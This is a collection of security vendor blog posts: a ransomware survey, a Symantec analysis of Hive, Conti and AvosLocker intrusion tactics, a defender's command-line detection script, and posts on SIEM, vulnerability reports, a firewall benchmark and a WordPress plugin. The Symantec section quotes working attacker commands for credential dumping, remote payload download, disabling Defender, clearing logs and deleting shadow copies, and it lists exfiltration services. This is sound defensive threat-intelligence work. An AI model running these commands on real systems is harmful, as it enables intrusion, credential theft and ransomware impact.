The State of Ransomware 2022

Today Sophos has released the State of Ransomware 2022, its annual study of the real-world ransomware experiences of IT professionals working at the frontline around the globe.

The study has revealed an ever more challenging attack environment together with the growing financial and operational burden ransomware places on its victims. It also shines new light on the relationship between ransomware and cyber insurance, and the role insurance is playing in driving changes to cyber defenses.

This year, 5,600 IT professionals from 31 countries participated in the research, with 965 sharing details of ransom payments made. Key findings include:

  • Ransom attacks are more frequent – 66% of organizations surveyed were hit with ransomware in 2021, up from 37% in 2020
  • Ransom payments are higher – In 2021, 11% of organizations said they paid ransoms of $1 million or more, up from 4% in 2020, while the percentage of organizations paying less than $10,000 dropped to 21% from 34% in 2020. Overall, the average ransom paid by organizations that had data encrypted in their most significant ransomware attack increased nearly fivefold to reach $812,360
  • More victims are paying the ransom – In 2021, 46% of organizations that had data encrypted in a ransomware attack paid the ransom. Twenty-six percent of organizations that were able to restore encrypted data using backups in 2021 also paid the ransom
  • The impact of a ransomware attack can be immense – The average cost to recover from the most recent ransomware attack in 2021 was $1.4 million. It took on average one month to recover from the damage and disruption. 90% of organizations said the attack had impacted their ability to operate, and 86% of private sector victims said they had lost business and/or revenue because of the attack
  • Many organizations rely on cyber insurance to help them recover from a ransomware attack – 83% of mid-sized organizations had cyber insurance that covers them in the event of a ransomware attack
  • Cyber insurance almost always pays out – In 98% of incidents where the victim had cyber insurance that covered ransomware, the insurer paid some or all the costs incurred (with 40% overall covering the ransom payment)
  • 94% of those with cyber insurance said that their experience of getting it has changed over the last 12 months, with higher demands for cybersecurity measures, more complex or expensive policies and fewer organizations offering insurance protection

“The findings suggest we may have reached a peak in the evolutionary journey of ransomware, where attackers’ greed for ever higher ransom payments is colliding head on with a hardening of the cyber insurance market as insurers increasingly seek to reduce their ransomware risk and exposure,” said Chester Wisniewski, principal research scientist at Sophos.

“In recent years, it has become increasingly easy for cybercriminals to deploy ransomware, with almost everything available as-a-service. Second, many cyber insurance providers have covered a wide range of ransomware recovery costs, including the ransom, likely contributing to ever higher ransom demands. However, the results indicate that cyber insurance is getting tougher and in the future ransomware victims may become less willing or less able to pay sky high ransoms. Sadly, this is unlikely to reduce the overall risk of a ransomware attack. Ransomware attacks are not as resource intensive as some other, more hand-crafted cyberattacks, so any return is a return worth grabbing and cybercriminals will continue to go after the low hanging fruit.”

To learn more, read the State of Ransomware 2022.

About the study

Sophos commissioned research agency Vanson Bourne to conduct an independent, vendor-agnostic survey of 5,600 IT professionals in mid-sized organizations (100-5,000 employees) across 31 countries. The survey was conducted during January and February 2022, and respondents were asked to respond based on their experiences over the previous year. Respondents were from Australia, Austria, Belgium, Brazil, Canada, Chile, Colombia, Czech Republic, France, Germany, Hungary, India, Israel, Italy, Japan, Malaysia, Mexico, Netherlands, Nigeria, Philippines, Poland, Saudi Arabia, Singapore, South Africa, Spain, Sweden, Switzerland, Turkey, UAE, UK, and US.

Source :
https://news.sophos.com/en-us/2022/04/27/the-state-of-ransomware-2022/

Ransomware: How Attackers are Breaching Corporate Networks

Latest tools, tactics, and procedures being used by the Hive, Conti, and AvosLocker ransomware operations.

Targeted ransomware attacks continue to be one of the most critical cyber risks facing organizations of all sizes. The tactics used by ransomware attackers are continually evolving, but by identifying the most frequently employed tools, tactics, and procedures (TTPs) organizations can gain a deeper understanding into how ransomware groups infiltrate networks and use this knowledge to identify and prioritize areas of weakness.

Symantec, a division of Broadcom Software, tracks various ransomware threats; however, the following three ransomware families are being observed in the majority of recent attacks:

  • Hive
  • Conti
  • Avoslocker

Similar to many other ransomware families, Hive, Conti, and Avoslocker follow the ransomware-as-a-service (RaaS) business model. In the RaaS model the ransomware operators hire affiliates who are responsible for launching the ransomware attacks on their behalf. In most cases affiliates stick to a playbook that contains detailed attack steps laid out by the ransomware operators.

Once initial access to a victim network has been gained, Hive, Conti, and Avoslocker use a plethora of TTPs to help the operators achieve the following:

  • Gain persistence on the network
  • Escalate privileges
  • Tamper with and evade security software
  • Laterally move across the network

Initial Access

Affiliates for the Hive, Conti, and Avoslocker ransomware operators use a variety of techniques to gain an initial foothold on victim networks. Some of these techniques include:

  • Spear phishing leading to the deployment of malware, including but not limited to:
    • IcedID
    • Emotet
    • QakBot
    • TrickBot
  • Taking advantage of weak RDP credentials
  • Exploiting vulnerabilities such as:
    • Microsoft Exchange vulnerabilities – CVE-2021-34473, CVE-2021-34523, CVE-2021-31207, CVE-2021-26855
    • FortiGate firewall vulnerabilities – CVE-2018-13379 and CVE-2018-13374
    • Apache Log4j vulnerability – CVE-2021-44228

In most cases, the spear-phishing emails contain Microsoft Word document attachments embedded with macros that lead to the installation of one of the previously mentioned malware threats. In some instances, attackers use this malware to install Cobalt Strike, which is then used to pivot to other systems on the network. These malware threats are then used to distribute ransomware onto compromised computers.

Persistence

After gaining initial access, Symantec has observed affiliates for all three ransomware families using third-party software such as AnyDesk and ConnectWise Control (previously known as ScreenConnect) to maintain access to victim networks. They also enable default Remote Desktop access in the firewall:

netsh advfirewall firewall set rule group=”Remote Desktop” new enable=yes

Actors are also known to create additional users on compromised systems to maintain access. In some instances we have seen threat actors add registry entries that allow them to automatically log in when a machine is restarted:

reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v DefaultUserName /t REG_SZ /d <user> /f

reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v AutoAdminLogon /t REG_SZ /d 1 /f

Discovery

During the discovery phase the ransomware actors try to sweep the victim’s network to identify potential targets. Symantec has observed the aforementioned ransomware actors using tools such as the following:

  • ADRecon – Gathers Active Directory information and generates a report
  • Netscan – Discovers devices on the network

Credential Access

Mimikatz is a go-to tool for most ransomware groups and Hive, Conti, and Avoslocker are no exception. We have observed them using the PowerShell version of Mimikatz as well as the PE version of the tool. There are also instances where the threat actors directly load the PowerShell version of Mimikatz from GitHub repositories:

powershell IEX((new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/<redacted>/Invoke-Mimikatz.ps1’));Invoke-Mimikatz -DumpCreds

In addition to using Mimikatz, the threat actors have also taken advantage of the native rundll32 and comsvcs.dll combination to dump the LSASS memory:

rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <process id> lsass.dmp full

Adversaries also dump the SECURITY, SYSTEM, and SAM hives and later extract credentials from the dump. In rare occasions they have also been observed using taskmgr.exe to dump the LSASS memory and later using the dump to extract valuable credentials.

Lateral Movement

Attackers employ tools like PsExec, WMI, and BITSAdmin to laterally spread and execute the ransomware on victim networks. We have also observed the attackers using several other techniques to laterally move across networks.

  • PsExec

psexec -accepteula @ips.txt -s -d -c CSIDL_WINDOWS\xxx.exe

  • WMI

wmic /node:@C:\share$\comps1.txt /user:”user” /password:”password” process call create “cmd.exe /c bitsadmin /transfer xxx \\IP\share$\xxx.exe %APPDATA%\xxx.exe&%APPDATA%\xxx.exe”

  • BITSAdmin

bitsadmin /transfer debjob /download /priority normal hxxp://<IP>/ele.dll CSIDL_WINDOWS\ele.dll

  • Mimikatz

mimikatz.exe “privilege::debug” “sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<ntlm hash>”

Defense Evasion

As with a number of other ransomware families, Hive, Conti, and Avoslocker also tamper with various security products that interfere with their goal. We have observed them meddling with security services using the net, taskkill, and sc commands to disable or terminate them. In some cases they also use tools like PC Hunter to end processes. They have also been seen tampering with various registry entries related to security products, since changes to the registry entries can make those products inoperative.

Both Hive and AvosLocker have been observed attempting to disable Windows Defender using the following reg.exe commands.

AvosLocker:

reg add “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender” /v DisableAntiSpyware /t REG_DWORD /d 1 /f

Hive:

reg.exe delete “HKLM\Software\Policies\Microsoft\Windows Defender” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiSpyware” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiVirus” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine” /v “MpEnablePus” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableBehaviorMonitoring” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableIOAVProtection” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableOnAccessProtection” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableRealtimeMonitoring” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection” /v “DisableScanOnRealtimeEnable” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\Reporting” /v “DisableEnhancedNotifications” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “DisableBlockAtFirstSeen” /t REG_DWORD /d “1” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “SpynetReporting” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet” /v “SubmitSamplesConsent” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger” /v “Start” /t REG_DWORD /d “0” /f

reg.exe add “HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger” /v “Start” /t REG_DWORD /d “0” /f

reg.exe delete “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run” /v “Windows Defender” /f

reg.exe delete “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v “Windows Defender” /

Disabling the default Windows firewall is also one of the techniques we have seen being used by these ransomware families:

netsh advfirewall set allprofiles state off

To cover their tracks on a victim system the actors may also clear the Windows event log:

wevtutil.exe cl system

wevtutil.exe cl security

wevtutil.exe cl application

powershell -command “Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }”

Impact

Adversaries tend to disable or tamper with operating system settings in order to make it difficult for administrators to recover data. Deleting shadow copies is a common tactic threat actors perform before starting the encryption process. They perform this task by using tools like Vssadmin or WMIC and running one of the following commands:

vssadmin.exe delete shadows /all /quiet

wmic.exe shadowcopy delete

We have also seen BCDEdit being used to disable automatic system recovery and to ignore failures on boot:

bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures

bcdedit.exe /set {default} recoveryenabled no

In some instances the actors delete the safe mode settings in the registry to stop security product services from starting in safe mode:

reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\<service> /f
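The command lines quoted in the Persistence, Credential Access, Defense Evasion and Impact sections lend themselves to process-creation detections; the following is an added example for defenders, not Symantec's code or signatures. The rule names, the event record layout, the sample events and the 10-minute correlation window are assumptions made for the illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (rule id, section heading in the article, regex over the normalised command line).
# Patterns cover only the command forms quoted in the article.
RULES = [(rid, phase, re.compile(rx)) for rid, phase, rx in [
    ("rdp_firewall_rule_enabled", "Persistence",
     r"\bnetsh(\.exe)? advfirewall firewall set rule group=remote desktop new enable=yes"),
    ("autologon_registry", "Persistence",
     r"\breg(\.exe)? add .*\\currentversion\\winlogon /v (autoadminlogon|defaultusername)\b"),
    ("lsass_minidump_comsvcs", "Credential Access",
     r"\brundll32(\.exe)? .*comsvcs\.dll,? ?minidump\b"),
    ("defender_policy_tamper", "Defense Evasion",
     r"\breg(\.exe)? (add|delete) hk(lm|ey_local_machine)\\software\\policies\\microsoft\\windows defender"),
    ("firewall_disabled", "Defense Evasion",
     r"\bnetsh(\.exe)? advfirewall set allprofiles state off"),
    ("eventlog_cleared", "Defense Evasion",
     r"\bwevtutil(\.exe)? (cl|clear-log) \S+|\bclear-eventlog\b"),
    ("shadow_copies_deleted", "Impact",
     r"\bvssadmin(\.exe)? delete shadows|\bwmic(\.exe)? shadowcopy delete"),
    ("boot_recovery_disabled", "Impact",
     r"\bbcdedit(\.exe)? /set \S+ (recoveryenabled no|bootstatuspolicy ignoreallfailures)"),
    ("safeboot_key_deleted", "Impact",
     r"\breg(\.exe)? delete hk(lm|ey_local_machine)\\system\\currentcontrolset\\control\\safeboot\\"),
]]

_QUOTES = str.maketrans("", "", "\"'“”‘’")


def normalise(cmdline):
    """Lower-case, drop straight/curly quotes and collapse whitespace so that
    quoting and spacing differences do not defeat the patterns."""
    return " ".join(cmdline.translate(_QUOTES).lower().split())


def match_rules(cmdline):
    """Return [(rule_id, phase), ...] for every rule the command line triggers."""
    norm = normalise(cmdline)
    return [(rid, phase) for rid, phase, rx in RULES if rx.search(norm)]


def triage(events, window=timedelta(minutes=10)):
    """Group hits per host and escalate hosts where security tooling was
    tampered with and recovery was sabotaged within `window` of each other,
    the sequence the article describes just before encryption starts."""
    per_host = defaultdict(list)
    for ev in events:
        ts = datetime.fromisoformat(ev["time"])
        for rule_id, phase in match_rules(ev["cmdline"]):
            per_host[ev["host"]].append((ts, rule_id, phase))

    report = {}
    for host, hits in per_host.items():
        evasion = [ts for ts, _, ph in hits if ph == "Defense Evasion"]
        impact = [ts for ts, _, ph in hits if ph == "Impact"]
        report[host] = {
            "rules": sorted({rid for _, rid, _ in hits}),
            "phases": sorted({ph for _, _, ph in hits}),
            "escalate": any(abs(i - e) <= window for i in impact for e in evasion),
        }
    return report


# Constructed process-creation records (host names and times are invented).
SAMPLE_EVENTS = [
    {"time": "2022-04-20T02:11:05", "host": "WS-014",
     "cmdline": "netsh advfirewall set allprofiles state off"},
    {"time": "2022-04-20T02:11:40", "host": "WS-014",
     "cmdline": r"reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiSpyware” /t REG_DWORD /d “1” /f"},
    {"time": "2022-04-20T02:13:02", "host": "WS-014",
     "cmdline": "wevtutil.exe cl security"},
    {"time": "2022-04-20T02:15:30", "host": "WS-014",
     "cmdline": "vssadmin.exe  delete shadows /all /quiet"},
    {"time": "2022-04-20T02:15:41", "host": "WS-014",
     "cmdline": "bcdedit.exe /set {default} recoveryenabled no"},
    # Routine administration that must not fire.
    {"time": "2022-04-20T09:00:00", "host": "SRV-BACKUP",
     "cmdline": "vssadmin list shadows"},
    {"time": "2022-04-20T09:01:00", "host": "SRV-BACKUP",
     "cmdline": "wevtutil qe Security /c:5"},
    {"time": "2022-04-20T09:02:00", "host": "SRV-BACKUP",
     "cmdline": r'reg query "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender"'},
    # A single persistence-style hit: reported, but not escalated.
    {"time": "2022-04-20T10:30:00", "host": "HELPDESK-02",
     "cmdline": 'netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes'},
]

if __name__ == "__main__":
    for host, result in sorted(triage(SAMPLE_EVENTS).items()):
        print(host, result)
```

In practice the records would come from Windows Security event 4688 (with command-line auditing enabled) or Sysmon event 1, and single hits such as the Remote Desktop rule change need allow-listing for legitimate administration.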

Exfiltration

Attackers commonly exfiltrate critical data from a victim’s environment before encrypting it. They then use the stolen data in an attempt to extort a ransom from victims. We have observed threat actors using the following cloud services to exfiltrate data:

  • https://anonfiles.com
  • https://mega.nz
  • https://send.exploit.in
  • https://ufile.io
  • https://www.sendspace.com

We have also seen attackers use the following tools for data exfiltration:

  • Filezilla
  • Rclone

Conclusion

The TTPs outlined in this blog are a snapshot of the current ransomware threat landscape. The TTPs used by these threat actors are constantly evolving, with groups continually tweaking their methods in a bid to outmaneuver their targets’ security defenses. As such, organizations need to be vigilant and employ a multi-layered security approach.

Symantec Protection

Symantec Endpoint Protection (SEP) protects against ransomware attacks using multiple static and dynamic technologies.

AV Protection

  • Ransom.Hive
  • Ransom.Conti
  • Ransom.AvosLocker
  • Backdoor.Cobalt
  • Hacktool.Mimikatz
  • Trojan.IcedID*
  • Trojan.Emotet*
  • W32.Qakbot*
  • Trojan.Trickybot*

Behavioral Protection

  • SONAR.RansomHive!g2
  • SONAR.RansomHive!g3
  • SONAR.RansomHive!g4
  • SONAR.RansomAvos!g2
  • SONAR.RansomConti!g1
  • SONAR.RansomConti!g3
  • SONAR.RansomConti!g4
  • SONAR.Ransomware!g30
  • SONAR.RansomGregor!g1
  • SONAR.SuspLaunch!gen4
  • SONAR.SuspLaunch!g18
  • SONAR.Ransom!gen59
  • SONAR.Ransomware!g26
  • SONAR.Cryptlck!g171

Intrusion Prevention System (IPS) detections

IPS blocks initial access, persistence, and lateral movement. SEP’s Audit Signatures are intended to raise awareness of potentially unwanted traffic on the network. By default, Audit Signatures do not block. Administrators reviewing the logs of IPS events in their network can note these Audit events and decide whether or not to configure the corresponding Audit Signatures to block the traffic.

The following is a list of Audit Signatures that can be enabled to block, through policies, activity related to the use of software or tools such as AnyDesk, ScreenConnect, and PsExec.

Symantec recommends that you have intrusion prevention enabled on all your devices including servers.

Adaptive Protection

Symantec Adaptive Protection can help protect against lateral movement and ransomware execution techniques used by an attacker. If you are not using tools like PsExec, WMIC, and BITSAdmin in your environment then you should “Deny” these applications and actions using Symantec Adaptive Protection policies.

Recommendations

  • Customers are advised to enable their Intrusion Prevention System (IPS) on desktops and servers for best protection. Click here for instructions on enabling the IPS Server Performance Tuning feature. This feature should be enabled on servers to allow additional tuning for the IPS module and definitions in high-throughput scenarios.
  • Customers are also advised to enable Proactive Threat Protection, also known as SONAR, which is Symantec’s behavior-based protection.
  • Customers should also keep Symantec Endpoint Protection (SEP) up-to-date with the latest version and definition set.
  • Symantec has multi-layer protection technologies for all the threat types. To provide the best protection, all SEP features should be enabled for Windows desktops and servers.

Source :
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

5 benefits of integrating corporate SIEM systems

A company can accumulate massive amounts of information that security analysts are not able to monitor instantly. This can mean that priority security alerts either go unnoticed or are considered a false alarm because the appropriate technology is not available, which results in organizations failing to take action in time.  

A Security Information and Event Management (SIEM) system specializes in prioritizing critical alerts over information received in real time, thus adapting to the needs of all organizations. This is achieved by incorporating multiple intelligence feeds and logs according to the criteria and needs set by the IT department. This makes it possible to categorize events and contextualize cybersecurity threat alerts. 

The main benefits of having corporate SIEM systems are as follows:  

  • A SIEM system ensures that alerts reach the right people so that they can carry out contextualized research and apply remediation mechanisms. This saves time as analysts are not required to interpret data from so many different sources. 
  • It reduces the company’s costs, both in terms of infrastructure – by gaining full visibility into how the systems accessing the network are using it – and in terms of consuming resources. For example, a SIEM system can analyze the bandwidth machines are using and generate an event warning if one of them is consuming more resources than it should, which the IT department then checks for anomalies. SIEM enables better management of security resources, which translates into cost savings.  
  • It restores cybersecurity configurations if they have been changed by mistake, which could leave an organization dangerously exposed to threats. SIEM can automatically detect a change in the configuration and generate an event to alert the company’s security analyst, who reviews the change and can restore the previous configuration if the new one is potentially hazardous to the company. 
  • It detects operational maintenance activities in the business infrastructure that could pose a risk to the organization. Cybersecurity administrators incorporate the function of creating an event before a change to the company’s maintenance activities log, as well as in Windows. Then if there is any malicious activity they can decide whether or not to validate these adjustments. 
  • It provides cyberattack control and protection in order to act before it becomes an irreversible problem, filtering whether it is a real attack or a false alarm. Known or unknown attacks are analyzed whether they are malwareless attacks (which resort to the legitimate tools of the system itself) or DDoS attacks or advanced persistent threats (APTs). 

In the case of malware attacks, the usual security logs can send alerts for both real attacks and false alarms. To avoid alert saturation, SIEM solutions use event correlation to determine accurately whether or not it is a malware attack, as well as to detect the potential access points for the attack.  

In DDoS attacks, SIEM is able to flag such an event from web traffic logs, prioritizing the event and sending it to an analyst for investigation before causing a slowdown or a total company service outage. 

Finally, due to their complexity, when advanced persistent threats are detected they may not trigger alerts or be considered false alarms. Having a SIEM solution helps demonstrate a pattern of anomalous behavior, flagging it as a real concern for security analysts to investigate. 

Given the differentiating value of this solution, WatchGuard has incorporated its SIEMFeeder module into WatchGuard EDR and EDPR to collect and correlate the status of IT systems, enabling organizations to turn large volumes of data into useful information for decision making. 

Source :
https://www.watchguard.com/wgrd-news/blog/5-benefits-integrating-corporate-siem-systems

Everything you need to know to create a Vulnerability Assessment Report

You’ve been asked for a Vulnerability Assessment Report for your organisation and for some of you reading this article, your first thought is likely to be “What is that?”

Worry not. This article will answer that very question as well as why you need a Vulnerability Assessment Report and where you can get one from.

As it’s likely the request for such a report came from an important source such as the Board, a partner, a client or an auditor, there isn’t a moment to waste. So let’s dive straight in.

What is a Vulnerability Assessment Report and why do you need one?

A Vulnerability Assessment Report is simply a document that illustrates how you are managing your organisation’s vulnerabilities. It’s important because, with tens of thousands of new technology flaws being discovered every year, you need to be able to prove that your organisation does its best to avoid attack if you want to be trusted by partners and customers.

A best security practice recommended by governments across the world, a vulnerability assessment is an automated review process that provides insights into your current security state. The vulnerability assessment report is the outcome of this review. Used as a roadmap to a better state of security preparedness, it lays out the unique risks your organisation is up against due to the technology you use, and reveals how best to overcome them with minimal disruption to your core business strategy and operations.

The help it provides is clear but why do you need one? As mentioned above, it’s likely you were asked for a Vulnerability Assessment Report by the Board, a partner, a client or an auditor as each of these groups needs reassurance that you’re on top of any weaknesses in your infrastructure. Here’s why:

— Customers need to trust you

Weaknesses in your IT systems could affect your customers’ operations. With supply chain attacks on the rise, a vulnerability in a single company could leave the whole range of organizations paralysed, as demonstrated by the infamous SolarWinds hack last year.

It doesn’t matter how small your business is; if your customers will be entrusting you with any of their data, they may wish for a Vulnerability Assessment Report first to confirm that your IT security practices are tiptop.

— The Board wants a better understanding of the business’ risk

Cyber security is a growing concern across many businesses, so chances are your board members want to take a better grip of their risk, before the lack of insights into vulnerabilities is turned into a much more serious business problem. With ransomware attacks regularly making headlines, having proper vulnerability management in place and presenting an “all clear” report, can give your business heads that needed peace of mind.

— Your auditors are checking for compliance

Many of the regulatory or compliance frameworks related to security and privacy, like SOC2, HIPAA, GDPR, ISO 27001, and PCI DSS, advise or outright require regular compliance scans and reporting, so if the request for a vulnerability assessment report was made by your auditor, it is likely to be for compliance purposes.

— Your CFO is renewing your cyber insurance

It could be the case that your insurance provider is seeking a vulnerability assessment report as part of the underwriting process. If you don’t want to run the risk of being denied your insurance payment or wouldn’t like to see your premiums rise, then you could benefit from supplying these reports regularly.

How often do you need to produce a vulnerability assessment report?

Regularly. Think of it like vulnerability scanning: For maximum efficacy, you need to conduct regular, if not constant, comprehensive evaluations of your entire technology stack, otherwise you could miss something that could bring your business to a costly halt.

Cybercriminals do not stop searching until they find something they can take advantage of. You need to scan your systems continuously and have up to date reporting to reflect your vigilance as and when it’s needed.

Modern vulnerability scanning solutions, like Intruder, will give you a cyber hygiene score which enables you to track the progress of your vulnerability management efforts over time, proving that your security issues are being continuously resolved in good time.

A vulnerability assessment report from Intruder, to provide evidence to your customers or regulators that a vulnerability scanning process is in place.

What should be included in a vulnerability assessment report?

Unfortunately, there isn’t a one size fits all report. While the contents are generally the number of vulnerabilities detected in your systems at a point in time, your different stakeholders will require varying levels of detail. Even for compliance purposes, vulnerability assessment reporting requirements can differ.

As a good rule of thumb, we recommend building an Executive Report containing graph views and composite cyber hygiene scores for the Board and C-Suite that clue them in on where they stand at any given moment. And for your IT team, their report needs greater detail such as how to apply the correct solutions to existing problems and sidestep subsequent mistakes.

Where can you get a Vulnerability Assessment Report from?

Ensuring your Vulnerability Assessment Reports contain all the elements and information your stakeholders require can take a lot of work and expertise; which can distract your security teams from other activities that will keep your organisation secure. That is why it’s recommended to choose an external provider to produce your reports.

Before you start comparing individual vendors, make sure you have a solid understanding of your technical environment and of the specific outcomes that the vulnerability assessment should present. This is because vulnerability assessment tools are not built the same; they check for different types of weaknesses, so you need to choose the solution that best suits your requirements. Consider the features and checks you’ll require, as well as the industry standards you need to follow and your budget.

Two key elements to consider relate to reporting: firstly, how flexible the assessment provider will be with how much detail is presented (particularly if you need to present data to different audiences); and secondly, how clearly the results are communicated. Scanning results can be overwhelming but the right vendor will demystify complex security data to grant you a clear, jargon-free understanding of the risks you face.

At Intruder, reports are designed to be well-understood, whilst also maintaining all the technical detail required by IT managers and DevOps teams. Whether you’re a massive enterprise or a fledgling startup, you can generate rapid reports, create compliance paper trails, stay secure, and communicate with employees and potential investors. Intruder offers a free trial of its software, which you can activate here. Get vulnerability assessment reporting in place now.

Source :
https://thehackernews.com/2022/04/everything-you-need-to-know-to-create.html

NSv Virtual Firewall: Tested and Certified in AWS Public Cloud

Looking for the best way to extend your firewall protection to the cloud? Independent testing recently found that SonicWall NSv series is more than up to the challenge.

More than 90% of enterprises use the cloud in some way, with 69% of those considered hybrid cloud users (utilizing both private and public clouds). Along with widespread remote work adoption, this shift is driving the need for scaled-out, distributed infrastructure.

Within this new cloud landscape, security has become more complex as the number of perimeters and integrations grow, and cybercriminals increasingly focus on security gaps and vulnerabilities in cloud implementations. It’s often easier for threat actors to exploit these vulnerabilities than it is to breach hardened components of the cloud deployment.

A next-generation firewall deployed in the cloud can protect critical data stored in the cloud. But it’s important to make sure this firewall provides the same level of security and performance as an on-premises firewall.

Recently, Tolly Group used Keysight Technologies’ brand-new native cloud testing solution — CyPerf — to measure the performance of SonicWall NSv 470 virtual firewall in Amazon Web Services (AWS). AWS is the major public cloud vendor, with a projected 49% market share in enterprise cloud adoption for 2022. AWS recommends a shared responsibility model, meaning AWS is responsible for the security of the cloud, and the customer is responsible for security in the cloud.

What is SonicWall NSv virtual firewall?

SonicWall’s NSv Series virtual firewalls provide all the security advantages of a physical firewall, plus all the operational and economic benefits of the cloud — including system scalability and agility, speed of system provisioning, simple management and cost reduction. NSv delivers full-featured security tools including VPN, IPS, application control and URL filtering. These capabilities shield all critical components of the private/public cloud environments from resource misuse attacks, cross-virtual-machine attacks, side-channel attacks, and common network-based exploits and threats.

What is Keysight Technologies CyPerf?

Keysight CyPerf is the industry’s first cloud-native software solution that recreates every aspect of a realistic workload across a variety of physical and cloud environments. CyPerf deployed across a variety of heterogeneous cloud environments realistically models dynamic application traffic, user behavior and threat vectors at scale. It validates hybrid cloud networks, security devices and services for more confident rollouts.

Putting SonicWall NSv to the Test

Keysight Technologies and Tolly Group engineers tested a SonicWall NSv 470 virtual firewall running SonicOSX version 7. The AWS instance for the NSv 470 under test was AWS C5.2xlarge. The engineers deployed CyPerf agents on AWS C5.n2xlarge instances to be certain that the agents would have sufficient resources to stress the firewall under test. Each of two agent instances was provisioned with 8 vCPUs, 21GB memory and 25GbE network interfaces.


Test methodology and results

The engineers used three different traffic profiles to collect results — unencrypted HTTP traffic, encrypted (HTTPS/TLS) traffic, and Tolly’s productivity traffic mix, which includes five applications: JIRA, Office 365, Skype, AWS S3 and Salesforce. Engineers used CyPerf application mix tests to create the Tolly productivity mix and generate stateful, simulated application traffic.

The tests were run against three different security profiles:

1) Firewall: Basic firewall functions with no policy set

2) IPS: Firewall with the intrusion prevention system feature enabled

3) Threat Prevention: Firewall with IPS, antivirus, anti-spyware and application control features enabled

The results observed in the AWS public cloud environment are similar to the results observed in a virtual environment.

| Test | Unencrypted HTTP Traffic | Encrypted HTTPS/TLS Traffic |
|---|---|---|
| Firewall Throughput | 7.70 Gbps | 3.10 Gbps |
| IPS Throughput | 7.60 Gbps | 3.05 Gbps |
| Threat Prevention | 7.40 Gbps | 3.04 Gbps |

Table 1: Test measurements for NSv 470 in AWS Cloud

Note: The table above highlights just a few of the test results. For complete results and test parameters, please download the report.

Conclusion

Most enterprises are moving their datacenters away from traditional on-premises deployments and to the cloud. It is imperative that security teams provide the same level of security for cloud server instances as they have been doing for on-premises physical servers. A next-generation firewall with advanced security services like IPS and application control is the first step to securing cloud instances against cyber threats.

In addition to security features, it is also important to choose a firewall that provides the right level of performance needed for a given cloud workload. SonicWall NSv series offers a variety of models with performance levels suited to any size of cloud deployment, with all the necessary security features enabled. To learn more about how SonicWall NSv Series excels in AWS environments, click here.

Source :
https://blog.sonicwall.com/en-us/2022/04/nsv-virtual-firewall-tested-and-certified-in-aws-public-cloud/

WP Shield Security PRO – Release 14.1

Our latest ShieldPRO 14.1 security plugin for WordPress brings a huge WordPress REST API integration along with some much-needed tweaks and enhancements.

Read on to discover everything we’ve included in your newest and favourite WordPress Security Plugin.

#1 Full Integration With WordPress REST API

Management of WordPress websites at scale is a huge challenge for all of us.

Consider the work that’s involved with managing just 1 WordPress site and all its plugins, themes, updates, backups and, of course, security.

Now multiply that by the number of WordPress sites you run.

It’s a huge amount of work.

This is why we built iControlWP many years back and why we also integrated Shield Security into it to allow WordPress admins to manage their WordPress sites at scale, and also their WordPress security.

But not everyone wants to use iControlWP and that’s totally cool! But we still want to open up management of Shield to folk that need to scale their WordPress security.

This is where our new WordPress REST API integration comes in. It leverages the very thorough platform that the WordPress Core provides, letting us build a REST API that is powerful, secure and easy to maintain.

Many clients won’t have a need for our REST API directly, but you may use tools and services that could take advantage of it if you asked them to.

#2 Hugely Improved Audit & Traffic Logs

This is a big one.

A short time ago we completely overhauled the Audit Trail and Traffic Logging features.

This involved a major revamp of the UI and the tables that display the logs.

As you can imagine, these tables and data sets can grow very large, particularly for busy websites.

Since we were loading a large dataset all at once, browsing these log tables became tedious and slow. For high traffic sites, it would be unusable in some cases, resulting in loading errors!

So we went back to our core implementation (again) and made the entire thing dynamic. Instead of loading all the records, we only load precisely what we need. This makes the initial loading near-instant.

The pagination will be a bit slower than what you’re used to – but this is because we’re loading just the log records you need, when you need them.

We’ve also adjusted the traffic log database table structure to help us speed all this along and provide more useful information right where you need it.

This is a major reworking and we hope you’ll love it!

#3 Run Shield As A “Must-Use” (MU) Plugin

If you’ve never heard of a must-use WordPress plugin, don’t worry, you’re not alone.

